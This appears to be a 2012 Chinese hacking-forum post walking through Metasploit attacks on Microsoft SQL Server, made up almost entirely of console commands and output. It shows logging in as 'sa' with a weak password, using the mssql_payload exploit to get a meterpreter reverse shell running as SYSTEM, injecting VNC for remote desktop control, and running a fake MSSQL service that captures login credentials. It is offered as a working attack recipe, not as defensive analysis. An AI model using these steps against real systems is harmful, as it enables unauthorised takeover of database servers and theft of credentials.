切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
303 MSF : Attack Mssql 2[复制链接]
发表于 2012-10-11 23:00:11 | 显示全部楼层 |!read_mode!
执行查询
  1. msf  auxiliary(mssql_idf) > use auxiliary/admin/mssql/mssql_sql
  2. msf  auxiliary(mssql_sql) > show options

  3. Module options (auxiliary/admin/mssql/mssql_sql):

  4.    Name                 Current Setting   Required  Description
  5.    ----                 ---------------   --------  -----------
  6.    PASSWORD                               no        The password for the specified username
  7.    RHOST                                  yes       The target address
  8.    RPORT                1433              yes       The target port
  9.    SQL                  select @@version  no        The SQL query to execute
  10.    USERNAME             sa                no        The username to authenticate as
  11.    USE_WINDOWS_AUTHENT  false             yes       Use windows authentification (requires DOMAIN option set)

  12. smsf  auxiliary(mssql_sql) > set PASSWORD 123456
  13. PASSWORD => 123456
  14. msf  auxiliary(mssql_sql) > set RHOST 5.5.5.3
  15. RHOST => 5.5.5.3
  16. msf  auxiliary(mssql_sql) > exploit

  17. [*] SQL Query: select @@version
  18. [*] Row Count: 1 (Status: 16 Command: 193)



  19. NULL
  20. ----
  21. Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
  22.         May  3 2005 23:18:38
  23.         Copyright (c) 1988-2003 Microsoft Corporation
  24.         Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)


  25. [*] Auxiliary module execution completed
  26. msf  auxiliary(mssql_sql) >
复制代码
取得SHELL
  1. msf > use exploit/windows/mssql/mssql_payload
  2. msf  exploit(mssql_payload) > set RHOST 5.5.5.3
  3. RHOST => 5.5.5.3
  4. msf  exploit(mssql_payload) > set PASSWORD 123456
  5. PASSWORD => 123456
  6. msf  exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
  7. PAYLOAD => windows/meterpreter/reverse_tcp
  8. msf  exploit(mssql_payload) > set LHOST 5.5.5.7
  9. LHOST => 5.5.5.7
复制代码
到这里 重要的是 METHOD 参数 有3个 CMD PS OLD,对于2005用OLD
  1. msf  exploit(mssql_payload) > set METHOD old
  2. METHOD => old
  3. msf  exploit(mssql_payload) > exploit

  4. [*] Started reverse handler on 5.5.5.7:4444
  5. [*] Warning: This module will leave jporOvxz.exe in the SQL Server %TEMP% directory
  6. [*] Writing the debug.com loader to the disk...
  7. [*] Converting the debug script to an executable...
  8. [*] Uploading the payload, please be patient...
  9. [*] Converting the encoded payload...
  10. [*] Executing the payload...
  11. [*] Sending stage (752128 bytes) to 5.5.5.3
  12. [*] Meterpreter session 2 opened (5.5.5.7:4444 -> 5.5.5.3:1031) at 2012-09-19 23:25:13 -0700

  13. meterpreter > getuid
  14. Server username: NT AUTHORITY\SYSTEM
  15. meterpreter > getpid
  16. Current pid: 3116
  17. meterpreter >
复制代码
VNC
  1. msf  exploit(mssql_payload) > set PAYLOAD windows/vncinject/reverse_tcp
  2. PAYLOAD => windows/vncinject/reverse_tcp
  3. msf  exploit(mssql_payload) > exploit

  4. [*] Started reverse handler on 5.5.5.7:4444
  5. [*] Warning: This module will leave NxdxWpkk.exe in the SQL Server %TEMP% directory
  6. [*] Writing the debug.com loader to the disk...
  7. [*] Converting the debug script to an executable...
  8. [*] Uploading the payload, please be patient...
  9. [*] Converting the encoded payload...
  10. [*] Executing the payload...
  11. [*] Sending stage (445440 bytes) to 5.5.5.3
  12. [*] Starting local TCP relay on 127.0.0.1:5900...
  13. [*] Local TCP relay started.
  14. [*] Launched vncviewer.
  15. [*] Session 3 created in the background.
  16. msf  exploit(mssql_payload) > Connected to RFB server, using protocol version 3.8
  17. Enabling TightVNC protocol extensions
  18. No authentication needed
  19. Authentication successful
  20. Desktop name "fuzzexp-f60914c"
  21. VNC server default format:
  22.   32 bits per pixel.
  23.   Least significant byte first in each pixel.
  24.   True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
  25. Warning: Cannot convert string "-*-helvetica-bold-r-*-*-16-*-*-*-*-*-*-*" to type FontStruct
  26. Using default colormap which is TrueColor.  Pixel format:
  27.   32 bits per pixel.
  28.   Least significant byte first in each pixel.
  29.   True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
  30. Using shared memory PutImage
  31. Same machine: preferring raw encoding
复制代码


伪造服务
  1. msf > use auxiliary/server/capture/mssql
  2. msf  auxiliary(mssql) > exploit
  3. [*] Auxiliary module execution completed

  4. [*] Listening on 0.0.0.0:1433...
  5. [*] Server started.
  6. msf  auxiliary(mssql) >
复制代码


当别人链接后:
  1. msf  auxiliary(mssql) > [*] MSSQL LOGIN 5.5.5.3:1043 sa / <empty>
  2. [*] MSSQL LOGIN 5.5.5.3:1044 sa / 123456
复制代码


可以用端口欺骗来实现
http://www.3g-sec.com/thread-309-1-2.html




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-11-26 03:45

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部